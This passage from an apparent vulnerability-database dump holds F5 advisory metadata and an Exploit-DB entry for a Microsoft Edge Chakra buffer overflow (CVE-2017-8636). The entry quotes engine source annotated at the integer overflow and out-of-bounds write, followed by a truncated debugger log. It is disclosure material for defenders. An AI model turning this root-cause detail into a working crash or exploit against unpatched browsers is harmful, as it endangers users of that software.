BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "modified": "2018-07-24T04:32:00", "published": "2017-09-19T00:55:00", "id": "F5:K52320548", "href": "https://support.f5.com/csp/article/K52320548", "title": "Expat vulnerability CVE-2016-0718", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-08-17T21:06:59", "bulletinFamily": "exploit", "description": "Microsoft Edge Chakra - Buffer Overflow. CVE-2017-8636. Dos exploit for Windows platform", "modified": "2017-08-17T00:00:00", "published": "2017-08-17T00:00:00", "id": "EDB-ID:42466", "href": "https://www.exploit-db.com/exploits/42466/", "type": "exploitdb", "title": "Microsoft Edge Chakra - Buffer Overflow", "sourceData": "<!--\r\nReport by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team\r\n\r\nThere is an overflow when constructoring a new object with arguments which has 0xffff elements in Chakra!\r\nThis issue can be reproduced steadly in uptodate Edge in Win10 WIP.\r\n\r\n//ChakraCore-master\\lib\\Runtime\\ByteCode\\ByteCodeEmitter.cpp\r\nvoid EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)\r\n{\r\n Js::ArgSlot argCount = pnode->sxCall.argCount;\t\t\t//pnode->sxCall.argCount=0xFFFF\r\n argCount++; // include \"this\"\t\t\t\t\t\t\t//overflow!!!! argCount==0\r\n\r\n BOOL fSideEffectArgs = FALSE;\r\n unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);\r\n Assert(argCount == tmpCount);\r\n\r\n if (argCount != (Js::ArgSlot)argCount)\r\n {\r\n Js::Throw::OutOfMemory();\r\n }\r\n\r\n byteCodeGenerator->StartStatement(pnode);\r\n\r\n // Start call, allocate out param space\r\n funcInfo->StartRecordingOutArgs(argCount);\r\n\r\n // Assign the call target operand(s), putting them into expression temps if necessary to protect\r\n // them from side-effects.\r\n if (fSideEffectArgs)\r\n {\r\n SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);\r\n }\r\n\r\n if (pnode->sxCall.pnodeTarget->nop == knopSuper)\r\n {\r\n EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator);\r\n }\r\n\r\n Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true);\r\n\r\n if (pnode->sxCall.pnodeArgs == nullptr)\r\n {\r\n funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);\r\n Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo)\r\n && CallTargetIsArray(pnode->sxCall.pnodeTarget))\r\n ? Js::OpCode::NewScObjArray : Js::OpCode::NewScObject;\r\n Assert(argCount == 1);\r\n\r\n Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);\r\n byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);\r\n byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode),\r\n pnode->sxCall.pnodeTarget->location, argCount, callSiteId);\r\n }\r\n else\r\n {\r\n byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);\r\n uint32 actualArgCount = 0;\r\n\r\n if (IsCallOfConstants(pnode))\r\n {\r\n funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);\r\n actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount);\r\n }\r\n else\r\n {\r\n Js::OpCode op;\r\n if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)))\r\n {\r\n op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray;\r\n }\r\n else\r\n {\r\n op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject;\r\n }\r\n\r\n Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);\r\n\r\n\r\n Js::AuxArray<uint32> *spreadIndices = nullptr;\r\n actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister, Js::Constants::NoRegister,\r\n false, true, byteCodeGenerator, funcInfo, callSiteId, pnode->sxCall.spreadArgCount, &spreadIndices);\r\n funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);\r\n\r\n\r\n if (pnode->sxCall.spreadArgCount > 0)\r\n {\r\n Assert(spreadIndices != nullptr);\r\n uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32);\r\n uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc;\r\n byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,\r\n (uint16)actualArgCount, Js::CallIExtended_SpreadArgs,\r\n spreadIndices, spreadIndicesSize, callSiteId);\r\n }\r\n else\r\n {\r\n byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,\r\n (uint16)actualArgCount, callSiteId);\r\n }\r\n }\r\n\r\n Assert(argCount == actualArgCount);\r\n }\r\n\r\n // End call, pop param space\r\n funcInfo->EndRecordingOutArgs(argCount);\r\n return;\r\n}\r\n\r\n//ChakraCore-master\\lib\\Runtime\\Language\\InterpreterStackFrame.cpp\r\ninline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue)\r\n{\r\n\tAssert(m_outParams + outRegisterID < m_outSp);\t\t\r\n\tm_outParams[outRegisterID] = aValue;\t\t\t\t//OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only \r\n}\r\n\r\n//ChakraCore-master\\lib\\Runtime\\Language\\InterpreterStackFrame.cpp\r\n Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)\r\n {\r\n\r\n#ifdef ENABLE_DEBUG_CONFIG_OPTIONS\r\n // Support for simulating partially initialized interpreter stack frame.\r\n InterpreterThunkStackCountTracker tracker;\r\n\r\n if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) &&\r\n CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount())\r\n {\r\n switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType))\r\n {\r\n case 0:\r\n DebugBreak();\r\n break;\r\n case 1:\r\n Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError);\r\n break;\r\n default:\r\n DebugBreak();\r\n }\r\n }\r\n#endif\r\n ScriptContext* functionScriptContext = function->GetScriptContext();\r\n ThreadContext * threadContext = functionScriptContext->GetThreadContext();\r\n Assert(!threadContext->IsDisableImplicitException());\r\n functionScriptContext->VerifyAlive(!function->IsExternal());\r\n Assert(threadContext->IsScriptActive());\r\n Assert(threadContext->IsInScript());\r\n\r\n FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody();\r\n#ifdef ENABLE_DEBUG_CONFIG_OPTIONS\r\n if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch\r\n {\r\n if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode())\r\n {\r\n Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode\r\n }\r\n else\r\n {\r\n Throw::FatalInternalError();\r\n }\r\n }\r\n#endif\r\n\r\n if (executeFunction->GetInterpretedCount() == 0)\r\n {\r\n executeFunction->TraceInterpreterExecutionMode();\r\n }\r\n\r\n\r\n class AutoRestore\r\n {\r\n private:\r\n ThreadContext *const threadContext;\r\n const uint8 savedLoopDepth;\r\n\r\n public:\r\n AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction)\r\n : threadContext(threadContext),\r\n savedLoopDepth(threadContext->LoopDepth())\r\n {\r\n if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction())\r\n {\r\n executeFunction->SetWasCalledFromLoop();\r\n }\r\n }\r\n\r\n ~AutoRestore()\r\n {\r\n threadContext->SetLoopDepth(savedLoopDepth);\r\n }\r\n } autoRestore(threadContext, executeFunction);\r\n\r\n#if ENABLE_PROFILE_INFO\r\n DynamicProfileInfo * dynamicProfileInfo = nullptr;\r\n const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter ||\r\n (executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction));\r\n if (doProfile)\r\n {\r\n#if !DYNAMIC_INTERPRETER_THUNK\r\n executeFunction->EnsureDynamicProfileInfo();\r\n#endif\r\n dynamicProfileInfo = executeFunction->GetDynamicProfileInfo();\r\n threadContext->ClearImplicitCallFlags();\r\n }\r\n#else\r\n const bool doProfile = false;\r\n#endif\r\n\r\n executeFunction->IncreaseInterpretedCount();\r\n#ifdef BGJIT_STATS\r\n functionScriptContext->interpretedCount++;\r\n functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount());\r\n#endif\r\n\r\n AssertMsg(!executeFunction->IsDeferredParseFunction(),\r\n \"Non-intrinsic functions must provide byte-code to execute\");\r\n\r\n executeFunction->BeginExecution();\r\n\r\n bool fReleaseAlloc = false;\r\n InterpreterStackFrame* newInstance = nullptr;\r\n Var* allocation = nullptr;\r\n\r\n if (!isAsmJs && executeFunction->IsCoroutine())\r\n {\r\n // If the FunctionBody is a generator then this call is being made by one of the three\r\n // generator resuming methods: next(), throw(), or return(). They all pass the generator\r\n // object as the first of two arguments. The real user arguments are obtained from the\r\n // generator object. The second argument is the ResumeYieldData which is only needed\r\n // when resuming a generator and so it only used here if a frame already exists on the\r\n // generator object.\r\n AssertMsg(args.Info.Count == 2, \"Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer\");\r\n JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]);\r\n newInstance = generator->GetFrame();\r\n\r\n if (newInstance != nullptr)\r\n {\r\n ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]);\r\n newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData);\r\n\r\n // The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so\r\n // give the InterpreterStackFrame a legit enough stack address to make this comparison work.\r\n newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator);\r\n }\r\n else\r\n {\r\n //\r\n // Allocate a new InterpreterStackFrame instance on the recycler heap.\r\n // It will live with the JavascriptGenerator object.\r\n //\r\n Arguments generatorArgs = generator->GetArguments();\r\n InterpreterStackFrame::Setup setup(function, generatorArgs);\r\n size_t varAllocCount = setup.GetAllocationVarCount();\r\n size_t varSizeInBytes = varAllocCount * sizeof(Var);\r\n DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality\r\n Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ? executeFunction->GetLoopHeaderArrayPtr() : nullptr;\r\n\r\n allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var);\r\n AnalysisAssert(allocation);\r\n#if DBG\r\n // Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame\r\n Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var);\r\n AnalysisAssert(invalidVar);\r\n memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject));\r\n newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar);\r\n#else\r\n newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr);\r\n#endif\r\n\r\n newInstance->m_reader.Create(executeFunction);\r\n\r\n generator->SetFrame(newInstance, varSizeInBytes);\r\n }\r\n }\r\n else\r\n {\r\n InterpreterStackFrame::Setup setup(function, args);\r\n size_t varAllocCount = setup.GetAllocationVarCount();\r\n size_t varSizeInBytes = varAllocCount * sizeof(Var);\r\n\r\n //\r\n // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.\r\n //\r\n DWORD_PTR stackAddr;\r\n\r\n // If the locals area exceeds a certain limit, allocate it from a private arena rather than\r\n // this frame. The current limit is based on an old assert on the number of locals we would allow here.\r\n if (varAllocCount > InterpreterStackFrame::LocalsThreshold)\r\n {\r\n ArenaAllocator *tmpAlloc = nullptr;\r\n fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);\r\n allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);\r\n stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)\r\n }\r\n else\r\n {\r\n PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);\r\n allocation = (Var*)_alloca(varSizeInBytes);\r\n#if DBG\r\n memset(allocation, 0xFE, varSizeInBytes);\r\n#endif\r\n stackAddr = reinterpret_cast<DWORD_PTR>(allocation);\r\n }\r\n\r\n /*\r\n * If the function has any loop headers, we allocate an array for the loop headers wrappers, and\r\n * reference the wrappers in the array. We then push the pointer to the array onto the stack itself.\r\n * We do this so that while the function is being interpreted, we don't want the jitted loop\r\n * bodies to be collected, even if the loop body isn't being executed. The loop body will\r\n * get collected when the function has been JITted, and when the function exits the interpreter.\r\n * The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but\r\n * it's cheaper to just copy them all into the recycler array rather than just the ones that\r\n * have been jitted.\r\n */\r\n Var loopHeaderArray = nullptr;\r\n\r\n if (executeFunction->GetHasAllocatedLoopHeaders())\r\n {\r\n // Loop header array is recycler allocated, so we push it on the stack\r\n // When we scan the stack, we'll recognize it as a recycler allocated\r\n // object, and mark it's contents and keep the individual loop header\r\n // wrappers alive\r\n loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr();\r\n }\r\n\r\n#if DBG\r\n Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject));\r\n memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject));\r\n newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar);\r\n#else\r\n newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr);\r\n#endif\r\n\r\n newInstance->m_reader.Create(executeFunction);\r\n }\r\n //\r\n // Execute the function's byte-code, returning the return-value:\r\n // - Mark that the function is current executing and may not be modified.\r\n //\r\n\r\n#if ENABLE_TTD\r\n TTD::TTDExceptionFramePopper exceptionFramePopper;\r\n if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))\r\n {\r\n bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock);\r\n\r\n threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally);\r\n exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function);\r\n }\r\n#endif\r\n\r\n Var aReturn = nullptr;\r\n\r\n {\r\n if (!isAsmJs && executeFunction->IsInDebugMode())\r\n {\r\n#if DYNAMIC_INTERPRETER_THUNK\r\n PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);\r\n aReturn = newInstance->DebugProcess();\r\n#else\r\n aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());\r\n#endif\r\n }\r\n else\r\n {\r\n#if DYNAMIC_INTERPRETER_THUNK\r\n PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);\r\n aReturn = newInstance->Process();\r\n#else\r\n aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());\r\n#endif\r\n }\r\n }\r\n\r\n executeFunction->EndExecution();\r\n\r\n#if ENABLE_TTD\r\n if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))\r\n {\r\n exceptionFramePopper.PopInfo();\r\n threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn);\r\n }\r\n#endif\r\n\r\n if (fReleaseAlloc)\r\n {\r\n functionScriptContext->ReleaseInterpreterArena();\r\n }\r\n\r\n#if ENABLE_PROFILE_INFO\r\n if (doProfile)\r\n {\r\n dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags());\r\n }\r\n#endif\r\n\r\n if (isAsmJs)\r\n {\r\n return newInstance;\r\n }\r\n return aReturn;\r\n }\r\n\r\n\t\r\nMicrosoft (R) Windows Debugger Version 6.12.0002.633 AMD64\r\nCopyright (c) Microsoft Corporation. All rights reserved.\r\n\r\n*** wait with pending attach\r\nSymbol search path is: SRV*c:\\mysymbol* http://msdl.microsoft.com/download/symbols\r\nExecutable search path is: \r\nModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000 C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\MicrosoftEdgeCP.exe\r\nModLoad: 00007ffe`a1ea0000 00007ffe`a207b000 C:\\Windows\\SYSTEM32\\ntdll.dll\r\nModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000 C:\\Windows\\System32\\KERNEL32.DLL\r\nModLoad: 00007ffe`9e590000 00007ffe`9e7d9000 C:\\Windows\\System32\\KERNELBASE.dll\r\nModLoad: 00007ffe`9c900000 00007ffe`9c97e000 C:\\Windows\\SYSTEM32\\apphelp.dll\r\nModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000 C:\\Windows\\System32\\combase.dll\r\nModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000 C:\\Windows\\System32\\ucrtbase.dll\r\nModLoad: 00007ffe`a0d00000 00007ffe`a0e25000 C:\\Windows\\System32\\RPCRT4.dll\r\nModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000 C:\\Windows\\System32\\bcryptPrimitives.dll\r\nModLoad: 00007ffe`a0c50000 00007ffe`a0ced000 C:\\Windows\\System32\\msvcrt.dll\r\nModLoad: 00007ffe`98900000 00007ffe`98960000 C:\\Windows\\SYSTEM32\\wincorlib.DLL\r\nModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000 C:\\Windows\\System32\\OLEAUT32.dll\r\nModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000 C:\\Windows\\System32\\msvcp_win.dll\r\nModLoad: 00007ffe`9e330000 00007ffe`9e341000 C:\\Windows\\System32\\kernel.appcore.dll\r\nModLoad: 00007ffe`7d930000 00007ffe`7dcf4000 C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\EdgeContent.dll\r\nModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000 C:\\Windows\\System32\\Windows.Storage.dll\r\nModLoad: 00007ffe`a0b90000 00007ffe`a0c31000 C:\\Windows\\System32\\advapi32.dll\r\nModLoad: 00007ffe`9f400000 00007ffe`9f459000 C:\\Windows\\System32\\sechost.dll\r\nModLoad: 00007ffe`96080000 00007ffe`96306000 C:\\Windows\\SYSTEM32\\iertutil.dll\r\nModLoad: 00007ffe`a13b0000 00007ffe`a1401000 C:\\Windows\\System32\\shlwapi.dll\r\nModLoad: 00007ffe`a0e30000 00007ffe`a0eda000 C:\\Windows\\System32\\shcore.dll\r\nModLoad: 00007ffe`9f460000 00007ffe`9f487000 C:\\Windows\\System32\\GDI32.dll\r\nModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000 C:\\Windows\\System32\\gdi32full.dll\r\nModLoad: 00007ffe`a1c90000 00007ffe`a1dda000 C:\\Windows\\System32\\USER32.dll\r\nModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000 C:\\Windows\\System32\\win32u.dll\r\nModLoad: 00007ffe`9e370000 00007ffe`9e3bc000 C:\\Windows\\System32\\powrprof.dll\r\nModLoad: 00007ffe`9e310000 00007ffe`9e325000 C:\\Windows\\System32\\profapi.dll\r\nModLoad: 00007ffe`9e210000 00007ffe`9e239000 C:\\Windows\\SYSTEM32\\USERENV.dll\r\nModLoad: 00007ffe`8d040000 00007ffe`8d066000 C:\\Windows\\SYSTEM32\\clipc.dll\r\nModLoad: 00007ffe`9d610000 00007ffe`9d641000 C:\\Windows\\SYSTEM32\\ntmarta.dll\r\nModLoad: 00007ffe`9dd60000 00007ffe`9dd77000 C:\\Windows\\SYSTEM32\\cryptsp.dll\r\nModLoad: 00007ffe`9d9a0000 00007ffe`9da44000 C:\\Windows\\SYSTEM32\\DNSAPI.dll\r\nModLoad: 00007ffe`a18b0000 00007ffe`a191c000 C:\\Windows\\System32\\WS2_32.dll\r\nModLoad: 00007ffe`a0b20000 00007ffe`a0b28000 C:\\Windows\\System32\\NSI.dll\r\nModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000 C:\\Windows\\System32\\IMM32.DLL\r\nModLoad: 00007ffe`9d960000 00007ffe`9d997000 C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL\r\nModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000 C:\\Windows\\SYSTEM32\\twinapi.appcore.dll\r\nModLoad: 00007ffe`9e1e0000 00007ffe`9e205000 C:\\Windows\\SYSTEM32\\bcrypt.dll\r\nModLoad: 00007ffe`9d440000 00007ffe`9d461000 C:\\Windows\\SYSTEM32\\profext.dll\r\nModLoad: 00007ffe`8c940000 00007ffe`8c9b4000 C:\\Windows\\SYSTEM32\\msiso.dll\r\nModLoad: 00007ffe`983e0000 00007ffe`98402000 C:\\Windows\\SYSTEM32\\EShims.dll\r\nModLoad: 00007ffe`90b10000 00007ffe`90b2b000 C:\\Windows\\SYSTEM32\\MPR.dll\r\nModLoad: 00007ffe`a1920000 00007ffe`a1a65000 C:\\Windows\\System32\\ole32.dll\r\nModLoad: 00007ffe`9cab0000 00007ffe`9cb45000 C:\\Windows\\system32\\uxtheme.dll\r\nModLoad: 00007ffe`8b6f0000 00007ffe`8b791000 C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll\r\nModLoad: 00007ffe`81fa0000 00007ffe`83651000 C:\\Windows\\SYSTEM32\\edgehtml.dll\r\nModLoad: 00007ffe`9a690000 00007ffe`9a7c9000 C:\\Windows\\SYSTEM32\\wintypes.dll\r\nModLoad: 00007ffe`915c0000 00007ffe`915ff000 C:\\Windows\\SYSTEM32\\MLANG.dll\r\nModLoad: 00007ffe`80f50000 00007ffe`8173a000 C:\\Windows\\SYSTEM32\\chakra.dll\r\nModLoad: 00007ffe`9afe0000 00007ffe`9b056000 C:\\Windows\\SYSTEM32\\policymanager.dll\r\nModLoad: 00007ffe`9af20000 00007ffe`9afaf000 C:\\Windows\\SYSTEM32\\msvcp110_win.dll\r\nModLoad: 00007ffe`9b2d0000 00007ffe`9b466000 C:\\Windows\\SYSTEM32\\PROPSYS.dll\r\nModLoad: 00007ffe`88e90000 00007ffe`88f5b000 C:\\Windows\\System32\\ieproxy.dll\r\nModLoad: 00007ffe`98590000 00007ffe`98696000 C:\\Windows\\System32\\Windows.UI.dll\r\nModLoad: 00007ffe`98500000 00007ffe`98582000 C:\\Windows\\SYSTEM32\\TextInputFramework.dll\r\nModLoad: 00007ffe`99ad0000 00007ffe`99da2000 C:\\Windows\\SYSTEM32\\CoreUIComponents.dll\r\nModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000 C:\\Windows\\SYSTEM32\\CoreMessaging.dll\r\nModLoad: 00007ffe`9ae40000 00007ffe`9ae55000 C:\\Windows\\SYSTEM32\\usermgrcli.dll\r\nModLoad: 00007ffe`98f20000 00007ffe`99451000 C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll\r\nModLoad: 00007ffe`9b470000 00007ffe`9b49a000 C:\\Windows\\SYSTEM32\\dwmapi.dll\r\nModLoad: 00007ffe`9f490000 00007ffe`a08c7000 C:\\Windows\\System32\\shell32.dll\r\nModLoad: 00007ffe`9ec30000 00007ffe`9ec79000 C:\\Windows\\System32\\cfgmgr32.dll\r\nModLoad: 00007ffe`a08d0000 00007ffe`a0a36000 C:\\Windows\\System32\\msctf.dll\r\nModLoad: 00007ffe`98700000 00007ffe`98802000 C:\\Windows\\SYSTEM32\\mrmcorer.dll\r\nModLoad: 00007ffe`8d070000 00007ffe`8d39e000 C:\\Windows\\SYSTEM32\\WININET.dll\r\nModLoad: 00007ffe`9e240000 00007ffe`9e270000 C:\\Windows\\SYSTEM32\\SspiCli.dll\r\nModLoad: 00007ffe`98860000 00007ffe`988c9000 C:\\Windows\\SYSTEM32\\Bcp47Langs.dll\r\nModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000 C:\\Windows\\SYSTEM32\\tokenbinding.dll\r\nModLoad: 00007ffe`8d800000 00007ffe`8d81b000 C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll\r\nModLoad: 00007ffe`963d0000 00007ffe`964a7000 C:\\Windows\\SYSTEM32\\winhttp.dll\r\nModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000 C:\\Windows\\system32\\mswsock.dll\r\nModLoad: 00007ffe`9a290000 00007ffe`9a29b000 C:\\Windows\\SYSTEM32\\WINNSI.DLL\r\nModLoad: 00007ffe`957f0000 00007ffe`959b8000 C:\\Windows\\SYSTEM32\\urlmon.dll\r\nModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000 C:\\Windows\\SYSTEM32\\CRYPTBASE.DLL\r\nModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000 C:\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll\r\nModLoad: 00007ffe`7fed0000 00007ffe`8005a000 C:\\Windows\\SYSTEM32\\ieapfltr.dll\r\nModLoad: 00007ffe`999d0000 00007ffe`999ed000 C:\\Windows\\System32\\rmclient.dll\r\nModLoad: 00007ffe`89aa0000 00007ffe`89ab8000 C:\\Windows\\System32\\UiaManager.dll\r\nModLoad: 00007ffe`8a860000 00007ffe`8a8a7000 C:\\Windows\\system32\\dataexchange.dll\r\nModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000 C:\\Windows\\SYSTEM32\\dcomp.dll\r\nModLoad: 00007ffe`9b940000 00007ffe`9bc1f000 C:\\Windows\\SYSTEM32\\d3d11.dll\r\nModLoad: 00007ffe`9d180000 00007ffe`9d224000 C:\\Windows\\SYSTEM32\\dxgi.dll\r\nModLoad: 00007ffe`8bb90000 00007ffe`8bc12000 C:\\Windows\\system32\\twinapi.dll\r\nModLoad: 00007ffe`84db0000 00007ffe`84e2a000 C:\\Windows\\SYSTEM32\\windows.ui.core.textinput.dll\r\nModLoad: 00007ffe`81c30000 00007ffe`81c58000 C:\\Windows\\SYSTEM32\\srpapi.dll\r\nModLoad: 00007ffe`9e3c0000 00007ffe`9e589000 C:\\Windows\\System32\\CRYPT32.dll\r\nModLoad: 00007ffe`9e350000 00007ffe`9e361000 C:\\Windows\\System32\\MSASN1.dll\r\nModLoad: 00007ffe`846e0000 00007ffe`8473a000 C:\\Windows\\System32\\Windows.Graphics.dll\r\nModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000 C:\\Windows\\SYSTEM32\\ninput.dll\r\nModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000 C:\\Windows\\SYSTEM32\\d2d1.dll\r\nModLoad: 00007ffe`943a0000 00007ffe`94660000 C:\\Windows\\SYSTEM32\\DWrite.dll\r\nModLoad: 00007ffe`81910000 00007ffe`8191f000 C:\\Windows\\System32\\Windows.Internal.SecurityMitigationsBroker.dll\r\nModLoad: 00007ffe`99510000 00007ffe`99552000 C:\\Windows\\SYSTEM32\\vm3dum64.dll\r\nModLoad: 00007ffe`994a0000 00007ffe`99507000 C:\\Windows\\SYSTEM32\\D3D10Level9.dll\r\nModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000 C:\\Windows\\System32\\oleacc.dll\r\nModLoad: 00007ffe`81bf0000 00007ffe`81c00000 C:\\Windows\\system32\\msimtf.dll\r\nModLoad: 00007ffe`940f0000 00007ffe`94178000 C:\\Windows\\system32\\directmanipulation.dll\r\nModLoad: 00007ffe`98170000 00007ffe`98184000 C:\\Windows\\System32\\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll\r\nModLoad: 00007ffe`81bb0000 00007ffe`81be8000 C:\\Windows\\System32\\smartscreenps.dll\r\nModLoad: 00007ffe`94210000 00007ffe`94398000 C:\\Windows\\SYSTEM32\\windows.globalization.dll\r\nModLoad: 00007ffe`8b520000 00007ffe`8b6e5000 C:\\Windows\\System32\\uiautomationcore.dll\r\n(1590.5d8): Break instruction exception - code 80000003 (first 